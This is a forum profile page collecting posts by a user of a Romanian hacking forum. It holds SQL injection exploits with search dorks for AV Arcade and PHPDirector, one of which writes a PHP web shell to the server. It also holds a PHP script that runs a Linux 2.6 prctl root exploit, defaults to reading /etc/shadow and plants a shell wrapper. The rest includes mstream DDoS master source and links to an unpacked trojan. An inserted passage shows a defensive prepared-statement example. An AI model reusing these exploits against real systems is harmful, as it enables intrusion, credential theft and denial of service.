Everything posted by kw3rln

  1. AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

     Web: AV Arcade 2.1b
     Site : www.avscripts.net
     Dork : "Powered By AV Arcade"
     Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
     Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

     Vulnerable code: admin/index.php:

         $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid']."");
         while($row = mysql_fetch_array($sql)){
             if ($row['admin'] == 1) {
                 define( 'ADMIN_ACCESS', 1 );
         [...]

     Exploit: Set in your cookies: ava_userid = 1; and that's all

     GREETZ: all memberz of RST and milw0rm
     //kw3rln [ http://rstzone.net ] [EOF]
  2. AV Arcade 2.1b (view_page.php) Remote SQL Injection

     Web: AV Arcade 2.1b
     Site : www.avscripts.net
     Dork : "Powered By AV Arcade"
     Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
     Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

     Description: SQL injection in $id of includes/view_page.php

     Exploit:

         index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password,4,5,6,7,8,9,10,11,12,13%20FROM%20ava_users%20WHERE%20id=1

     GREETZ: all memberz of RST and milw0rm
     //kw3rln [ http://rstzone.net ] [EOF]
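
Both AV Arcade posts above come down to request data (a cookie, a query parameter) being concatenated into SQL, and in the first case also being trusted as the user's identity. The following is an added example, not part of the posts and not AV Arcade's own code: it puts the cookie-based check from post 1 beside a session-based check with prepared statements, and adds a validated lookup for a numeric `id`. The `ava_pages` table, the accounts, the function names and the `$session` array standing in for `$_SESSION` are assumptions made for the illustration.

```php
<?php
// Added example with a constructed schema and data; not AV Arcade's own code.
// Runs offline from the PHP CLI against in-memory SQLite (needs pdo_sqlite).

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE ava_users (id INTEGER PRIMARY KEY, username TEXT,
               password TEXT, admin INTEGER)');
    // Hypothetical table: the post does not name the table view_page.php reads.
    $db->exec('CREATE TABLE ava_pages (id INTEGER PRIMARY KEY, title TEXT)');
    $ins = $db->prepare('INSERT INTO ava_users VALUES (?, ?, ?, ?)');
    $ins->execute([1, 'admin', password_hash('constructed-admin-pw', PASSWORD_DEFAULT), 1]);
    $ins->execute([2, 'player', password_hash('constructed-player-pw', PASSWORD_DEFAULT), 0]);
    $db->exec("INSERT INTO ava_pages VALUES (1, 'About')");
    return $db;
}

// Pattern from the post: the identity comes from a client-controlled cookie
// and is concatenated into the query. Kept only for comparison.
function is_admin_from_cookie(PDO $db, array $cookie): bool
{
    $res = $db->query('SELECT * FROM ava_users WHERE id=' . $cookie['ava_userid']);
    foreach ($res as $row) {
        if ($row['admin'] == 1) {
            return true;
        }
    }
    return false;
}

// Hardened login: the user id is written to server-side session state only
// after the password check succeeds.
function login(PDO $db, array &$session, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT id, password FROM ava_users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return false;
    }
    // In a web request: call session_regenerate_id(true) here and use $_SESSION.
    $session['ava_userid'] = (int) $row['id'];
    return true;
}

// Hardened admin check: reads the id from the session, never from the request,
// and binds it as a parameter.
function is_admin_from_session(PDO $db, array $session): bool
{
    if (!isset($session['ava_userid']) || !is_int($session['ava_userid'])) {
        return false;
    }
    $stmt = $db->prepare('SELECT admin FROM ava_users WHERE id = ?');
    $stmt->execute([$session['ava_userid']]);
    return (int) $stmt->fetchColumn() === 1;
}

// Hardened lookup for a numeric request parameter such as view_page.php's $id.
// Anything that is not a positive integer (SQL fragments, arrays) is rejected
// before the database is touched; the value is then bound, not concatenated.
function fetch_page_title(PDO $db, $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT title FROM ava_pages WHERE id = ?');
    $stmt->execute([$id]);
    $title = $stmt->fetchColumn();
    return $title === false ? null : (string) $title;
}

$db = make_db();
$session = [];                      // stands in for $_SESSION
$cookie = ['ava_userid' => '1'];    // the cookie value named in post 1

var_dump(is_admin_from_cookie($db, $cookie));       // cookie alone decides
var_dump(is_admin_from_session($db, $session));     // nobody has logged in
login($db, $session, 'player', 'constructed-player-pw');
var_dump(is_admin_from_session($db, $session));     // logged in, not an admin
login($db, $session, 'admin', 'constructed-admin-pw');
var_dump(is_admin_from_session($db, $session));     // logged in as the admin
var_dump(fetch_page_title($db, '1'));               // well-formed id
var_dump(fetch_page_title($db, '-1 UNION SELECT 1')); // non-integer input
var_dump(fetch_page_title($db, ['']));              // array input (id[]=)
```
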
  3. I also have an SQL injection in this software, but somewhere else... I should publish it too.
  4. PHPDirector <= 0.21 (SQL injection/Upload SHELL) Remote Vulnerabilities

     WEB APP: PHPDirector 0.21
     SITE: http://www.phpdirector.co.uk/site/
     DORK: "Powered by PHP Director"
     AUTHOR: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
     * Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

     DESCRIPTION:
     - SQL injection in $id of videos.php
     - admin & password are in config.php
     - Path disclosure
     - It doesn't deserve to make an sploit

     EXPLOIT:

     SQL INJECTION:

         http://www.site.com/videos.php?id=-1%20UNION%20SELECT%20name,news,vids_per_page,version,template,6,7,8,9,10,11,12,13,14,15%20FROM%20pp_config

     FIND ADMIN PASS & DB INFO:
     1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure)
     2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,load_file('[path_you_just_found]/config.php')%20FROM%20pp_config%20into%20outfile%20'[path_you_just_found]/config.txt'
     3. Now check: http://www.site.com/config.txt

     UPLOAD SHELL:
     1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure)
     2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,'<?php%20system($_GET[cmd]);%20?>',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'[path_founded]/shell.php'%20FROM%20pp_config
     3. http://www.site.com/shell.php?cmd=uname -a

     GREETZ: all memberz of RST and milw0rm
     //kw3rln [http://rstzone.net] [EOF]
  5. It depends very much on how the network is structured... if the traffic you want to capture passes through your home switch, then you will most likely capture the packets you want... otherwise I doubt it...
  6. Nice game, and now the exploit for it: http://www.babilonics.com/node/1104
  7. Link: http://rapidshare.com/files/11826381/i-r0x_Port_Blocker_1.0_Beta.zip.html

     Overview: This program's purpose is to open your TCP/UDP Ports (those selected) half way. If an intruder tries to connect to you, or scans your IP, and in doing so, will catch the intrusion attempt, log the attacker's IP, and will reject him any information on the details of your system. Mainly, this plays a "Man in the Middle" approach, so that when an attacker assumes you're vulnerable, when you're not (or are, that's why I made this), you trick him into his intentions, thus, in the end, the attacker will be wasting his time. This could be regarded as a tiny IDS (Intrusion Detection System) but I'll just leave it as a Port Blocker for now.

     How to use: I've put boundaries on a few areas, so to know what to do read and understand the following. To add a single port, click Add, then Listen. You must add at least ONE port in order for the program to work. Once you've got ports displayed under the "Blocked Port" List, you must highlight at least one of them to listen. Once you've begun listening, the program will listen to all ports listed in the Ports Blocked List. Also note that you don't overwrite your Port List, as I'm sure some of you might want to make your own specific port lists, and my Cmndlg control will not notify you of an overwritten file alert... so always keep a backup of your Port lists.

     Unintentional Implementations as follows:
     - This program can easily be used to hijack an unsuspecting user's IP
     - This program doesn't work the best under WIFI connections.
     - This program may interrupt certain services, if they are explicitly depended on, under your Operating System.

     This program works under Windows 98, Windows 2000, Windows XP Home and Pro.

     by xyr0x
  8. ProAgent 2.1.9 SpecialEdition Packed by: ACProtect 2.0 Now UnPacked. dl: http://rapidshare.com/files/34644688/Pa219un.rar
  9. Usage:

         bamcompile [-options] infile.php [outfile.exe]
         bamcompile [-options] project_directory mainfile.php [outfile.exe]

     Options:

         -w  Hide console window for windowed applications
         -c  Compress output exe (using UPX - must be available)
         -d  Do not encode PHP files

     www.bambalam.se/bamcompile
     Download Bamcompile: http://www.bambalam.se/bamcompile/download/bamcompile1.21.zip
     Download Source: http://www.bambalam.se/bamcompile/download/bamcompile_source1.21.zip
  10. <?php /* ####################################### # # # PRIVATE! PRIVATE! PRIVATE! # # # # XOR CREW # # # # # ####################################### */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... 
"; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php 
if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
  11. link: http://www.ussrback.com/docs/distributed/mstream.txt Makefile: ------------------------ CC = gcc # -g is so i can debug it better # -Wall so i can be happy CFLAGS = -g -Wall all: master server clean: rm -f master server master: master.c $(CC) $(CFLAGS) -o master master.c server: server.c $(CC) $(CFLAGS) -o server server.c ------------------------ master.c ------------------------ /* spwn */ #define PASSWORD "sex" #define SERVERFILE ".sr" #define MASTER_TCP_PORT 6723 #define MASTER_UDP_PORT 9325 #define SERVER_PORT 7983 #define MAXUSERS 3 #define USED 1 #define AUTH 2 #define max(one, two) (one > two ? one : two) #define MAX_IP_LENGTH 17 #define MAX_HOST_LENGTH 200 #include <unistd.h> #include <sys/time.h> #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/uio.h> #include <signal.h> /* prototypes for my functions */ void sighandle (int); int maxfd (int, int); void prompt (int); void tof (char *); void fof (char *); void send2server (u_long, char *, ...); void forkbg (void); void nlstr (char *); void sendtoall (char *, ...); char *inet_ntoa (struct in_addr); u_long inet_addr (const char *); int findfree (void); /* end of prototypes */ typedef struct _socks { int fd; int opts; int idle; char *ip; } socks; socks users[MAXUSERS]; int main (int argc, char *argv[]) { fd_set readset; int i, tcpfd, udpfd, socksize, pongs = 0; struct sockaddr_in udpsock, tcpsock, remotesock; struct timeval t; char ibuf[1024], obuf[1024], *arg[3]; signal(SIGINT, sighandle); signal(SIGHUP, sighandle); signal(SIGSEGV, sighandle); socksize = sizeof(struct sockaddr); if ((tcpfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(0); } if ((udpfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket"); exit(0); } tcpsock.sin_family = AF_INET; tcpsock.sin_port = 
htons(MASTER_TCP_PORT); tcpsock.sin_addr.s_addr = INADDR_ANY; memset(&tcpsock.sin_zero, 0, 8); if (bind(tcpfd, (struct sockaddr *)&tcpsock, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(0); } if (listen(tcpfd, MAXUSERS+1) == -1) { perror("listen"); exit(0); } i = 1; if (setsockopt(tcpfd, SOL_SOCKET, SO_KEEPALIVE, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } i = 1; if (setsockopt(tcpfd, SOL_SOCKET, SO_REUSEADDR, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } if (fcntl(tcpfd, F_SETFL, O_NONBLOCK) == -1) { perror("fcntl"); exit(0); } udpsock.sin_family = AF_INET; udpsock.sin_port = htons(MASTER_UDP_PORT); udpsock.sin_addr.s_addr = INADDR_ANY; memset(&udpsock.sin_zero, 0, 8); if (bind(udpfd, (struct sockaddr *)&udpsock, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(0); } i = 1; if (setsockopt(udpfd, SOL_SOCKET, SO_KEEPALIVE, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } i = 1; if (setsockopt(udpfd, SOL_SOCKET, SO_REUSEADDR, (void *)&i, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } for (i = 0 ; i <= MAXUSERS ; i++) { users[i].opts = (0 & ~USED); } forkbg(); t.tv_sec = 2; t.tv_usec = 1; for ( { for (i = 0 ; i <= MAXUSERS ; i++) if (users[i].opts & USED) if ((time(0) - users[i].idle) > 420) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nYou're too idle !\n"); send(users[i].fd, &obuf, strlen(obuf), 0); close(users[i].fd); users[i].opts &= ~USED; } FD_ZERO(&readset); FD_SET(tcpfd, &readset); FD_SET(udpfd, &readset); for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) FD_SET(users[i].fd, &readset); } if (select(maxfd(tcpfd, udpfd)+1, &readset, NULL, NULL, &t) == -1) continue; if (FD_ISSET(tcpfd, &readset)) { int socknum; u_long ip; struct hostent *hp; if ((socknum = findfree()) == -1) { socknum = accept(tcpfd, (struct sockaddr *)&remotesock, &socksize); close(socknum); continue; } users[socknum].fd = accept(tcpfd, (struct sockaddr *)&remotesock, &socksize); for (i = 0 ; i 
<= MAXUSERS ; i++) { if (users[i].opts & USED) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nConnection from %s\n", inet_ntoa(remotesock.sin_addr)); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } } users[socknum].opts = (USED & ~AUTH); ip = remotesock.sin_addr.s_addr; if ((hp = gethostbyaddr((char *)&ip, sizeof ip, AF_INET)) == NULL) { users[socknum].ip = (char *) malloc(MAX_IP_LENGTH); strncpy(users[socknum].ip, inet_ntoa(remotesock.sin_addr), MAX_IP_LENGTH-1); } else { users[socknum].ip = (char *) malloc(MAX_HOST_LENGTH); strncpy(users[socknum].ip, hp->h_name, MAX_HOST_LENGTH-1); } users[socknum].idle = time(0); } if (FD_ISSET(udpfd, &readset)) { memset(&ibuf, 0, sizeof ibuf); if (recvfrom(udpfd, &ibuf, (sizeof ibuf)-1, 0, (struct sockaddr *)&remotesock, &socksize) <= 0) continue; nlstr(ibuf); if (!strcmp(ibuf, "newserver")) { FILE *f; char line[1024]; int i; if ((f = fopen(SERVERFILE, "r")) == NULL) { f = fopen(SERVERFILE, "w"); fclose(f); continue; } while (fgets(line, (sizeof line)-1, f)) { nlstr(line); fof(line); nlstr(line); if (!strcmp(line, inet_ntoa(remotesock.sin_addr))) { continue; } } fclose(f); if ((f = fopen(SERVERFILE, "a")) == NULL) continue; memset(&obuf, 0, sizeof obuf); snprintf(obuf,(sizeof obuf)-1, "%s\n", inet_ntoa(remotesock.sin_addr)); tof(obuf); fprintf(f, "%s\n", obuf); for (i = 0 ; i <= MAXUSERS ; i++) if (users[i].opts & USED) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nNew server on %s.\n", inet_ntoa(remotesock.sin_addr)); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } fclose(f); } if (!strcmp(ibuf, "pong")) { pongs++; for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nGot pong number %d from %s\n", pongs, inet_ntoa(remotesock.sin_addr)); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } } } } for (i = 0 ; i <= MAXUSERS ; i++) { if (users[i].opts & USED) { if 
(FD_ISSET(users[i].fd, &readset)) { if (!(users[i].opts & AUTH)) { int x; memset(&ibuf, 0, sizeof ibuf); if (recv(users[i].fd, &ibuf, (sizeof ibuf)-1, 0) <= 0) { int y; users[i].opts = (~AUTH & ~USED); memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "%s has disconnected (not auth'd): %s\n", users[i].ip, strerror(errno)); for (y = 0 ; y <= MAXUSERS ; y++) if (users[y].opts & USED) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } close(users[i].fd); free(users[i].ip); continue; } users[i].idle = time(0); for (x = 0 ; x <= strlen(ibuf) ; x++) { if (ibuf[x] == '\n') ibuf[x] = '\0'; if (ibuf[x] == '\r') ibuf[x] = '\0'; } if (strcmp(ibuf, PASSWORD)) { int y; memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Invalid password from %s.\n", users[i].ip); for (y = 0 ; y <= MAXUSERS ; y++) if ((users[y].opts & USED) && (y != i)) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } free(users[i].ip); close(users[i].fd); users[i].opts = (~AUTH & ~USED); continue; } for (x = 0 ; x <= MAXUSERS ; x++) { if ((users[x].opts & USED) && (x != i)) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "\nPassword accepted for connection from %s.\n", users[i].ip); send(users[x].fd, &obuf, strlen(obuf), 0); prompt(users[x].fd); } } users[i].opts |= AUTH; prompt(users[i].fd); continue; } memset(&ibuf, 0, sizeof ibuf); if (recv(users[i].fd, &ibuf, (sizeof ibuf)-1, 0) <= 0) { int y; memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Lost connection to %s: %s\n", users[i].ip, strerror(errno)); for (y = 0 ; y <= MAXUSERS ; y++) if (users[y].opts & USED) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } free(users[i].ip); close(users[i].fd); users[i].opts = (~AUTH & ~USED); continue; } arg[0] = strtok(ibuf, " "); arg[1] = strtok(NULL, " "); arg[2] = strtok(NULL, " "); arg[3] = NULL; if (arg[2]) nlstr(arg[2]); if (!strncmp(arg[0], "stream", 6)) { struct hostent *hp; struct in_addr ia; if 
((!arg[1]) || (!arg[2])) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "Usage: stream <hostname> <seconds>\n"); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); continue; } if ((hp = gethostbyname(arg[1])) == NULL) { memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Unable to resolve %s.\n", arg[1]); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); continue; } memcpy(&ia.s_addr, &hp->h_addr, hp->h_length); sendtoall("stream/%s/%s", inet_ntoa(ia), arg[2]); memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "Streaming %s for %s seconds.\n", arg[1], arg[2]); send(users[i].fd, &obuf, strlen(obuf), 0); } if (!strncmp(arg[0], "quit", 4)) { int y; memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "%s has disconnected.\n", users[i].ip); for (y = 0 ; y <= MAXUSERS ; y++) if ((users[y].opts & USED) && y != i) { send(users[y].fd, &obuf, strlen(obuf), 0); prompt(users[y].fd); } free(users[i].ip); close(users[i].fd); users[i].opts = (~AUTH & ~USED); continue; } if (!strncmp(arg[0], "servers", 7)) { FILE *f; char line[1024]; if ((f = fopen(SERVERFILE, "r")) == NULL) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nServer file doesn't exist, creating \n"); send(users[i].fd, &obuf, strlen(obuf), 0); f = fopen(SERVERFILE, "w"); fclose(f); prompt(users[i].fd); continue; } memset(&obuf, 0, sizeof obuf); sprintf(obuf, "The following ips are known servers: \n"); send(users[i].fd, &obuf, strlen(obuf), 0); while (fgets(line, (sizeof line)-1, f)) { nlstr(line); fof(line); send(users[i].fd, &line, strlen(line), 0); } fclose(f); } if (!strncmp(arg[0], "help", 4) || !strncmp(arg[0], "commands", 8)) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nAvailable commands: \n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "stream\t\t--\tstream attack !\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "servers\t\t--\tPrints all known 
servers.\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "ping\t\t--\tping all servers.\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "who\t\t--\ttells you the ips of the people logged in\n"); send(users[i].fd, &obuf, strlen(obuf), 0); memset(&obuf, 0, sizeof obuf); sprintf(obuf, "mstream\t\t--\tlets you stream more than one ip at a time\n"); send(users[i].fd, &obuf, strlen(obuf), 0); } if (!strncmp(arg[0], "who", 3)) { int x; memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\nCurrently Online: \n"); send(users[i].fd, &obuf, strlen(obuf), 0); for (x = 0 ; x <= MAXUSERS ; x++) { memset(&obuf, 0, sizeof obuf); if (users[x].opts & USED && users[x].opts & AUTH) { snprintf(obuf, (sizeof obuf)-1, "Socket number %d\t[%s]\n", x, users[x].ip); send(users[i].fd, &obuf, strlen(obuf), 0); } } memset(&obuf, 0, sizeof obuf); sprintf(obuf, "\n"); send(users[i].fd, &obuf, strlen(obuf), 0); } if (!strncmp(arg[0], "ping", 4)) { pongs = 0; memset(&obuf, 0, sizeof obuf); sprintf(obuf, "Pinging all servers.\n"); send(users[i].fd, &obuf, strlen(obuf), 0); sendtoall("ping"); } if (!strncmp(arg[0], "mstream", 7)) { if ((!arg[1]) || (!arg[2])) { memset(&obuf, 0, sizeof obuf); sprintf(obuf, "Usage: mstream <ip1:ip2:ip3:...> <seconds>\n"); send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); continue; } memset(&obuf, 0, sizeof obuf); snprintf(obuf, (sizeof obuf)-1, "MStreaming %s for %s seconds.\n", arg[1], arg[2]); send(users[i].fd, &obuf, strlen(obuf), 0); sendtoall("mstream/%s/%s\n", arg[1], arg[2]); } prompt(users[i].fd); } } } } } int findfree (void) { int i; for (i = 0 ; i <= MAXUSERS ; i++) { if (!(users[i].opts & USED)) return i; } return -1; } void forkbg (void) { int pid; pid = fork(); if (pid == -1) { perror("fork"); exit(0); } if (pid > 0) { printf("Forked into background, pid %d\n", pid); exit(0); } } void nlstr (char *str) { int i; for (i = 0 ; str[i] != NULL ; i++) if ((str[i] 
== '\n') || (str[i] == '\r')) str[i] = '\0'; } void send2server (u_long addr, char *str, ...) { va_list vl; char buf[1024]; int fd; struct sockaddr_in sock; va_start(vl, str); vsnprintf(buf, (sizeof buf)-1, str, vl); va_end(vl); if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) return; sock.sin_family = AF_INET; sock.sin_port = htons(SERVER_PORT); sock.sin_addr.s_addr = addr; memset(&sock.sin_zero, 0, 8); sendto(fd, &buf, strlen(buf), 0, (struct sockaddr *)&sock, sizeof(struct sockaddr)); } void tof (char *str) { int i; for (i = 0 ; str[i] != 0 ; i++) str[i]+=50; } void fof (char *str) { int i; for (i = 0 ; str[i] != 0 ; i++) str[i]-=50; } void sendtoall (char *str, ...) { va_list vl; char buf[1024], line[1024]; struct sockaddr_in sock; int fd; FILE *f; va_start(vl, str); vsnprintf(buf, (sizeof buf)-1, str, vl); va_end(vl); if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) return; sock.sin_family = AF_INET; sock.sin_port = htons(SERVER_PORT); memset(&sock.sin_zero, 0, 8); if ((f = fopen(SERVERFILE, "r")) == NULL) { f = fopen(SERVERFILE, "w"); fclose(f); return; } while (fgets(line, (sizeof line)-1, f)) { nlstr(line); fof(line); nlstr(line); sock.sin_addr.s_addr = inet_addr(line); sendto(fd, &buf, strlen(buf), 0, (struct sockaddr *)&sock, sizeof(struct sockaddr)); } } void prompt (int fd) { char buf[5]; memset(&buf, 0, sizeof buf); sprintf(buf, "> "); send(fd, &buf, strlen(buf), 0); } int maxfd (int extra1, int extra2) { int mfd = 0, i; for (i = 0 ; i <= MAXUSERS ; i++) if (users[i].opts & USED) mfd = max(mfd, users[i].fd); mfd = max(max(extra1, extra2), mfd); return mfd; } void sighandle (int sig) { int i; char obuf[1024]; memset(&obuf, 0, sizeof obuf); switch (sig) { case SIGHUP: snprintf(obuf, (sizeof obuf)-1, "Caught SIGHUP, ignoring.\n"); break; case SIGINT: snprintf(obuf, (sizeof obuf)-1, "Caught SIGINT, ignoring.\n"); break; case SIGSEGV: snprintf(obuf, (sizeof obuf)-1, "Segmentation Violation, Exiting cleanly..\n"); break; default: 
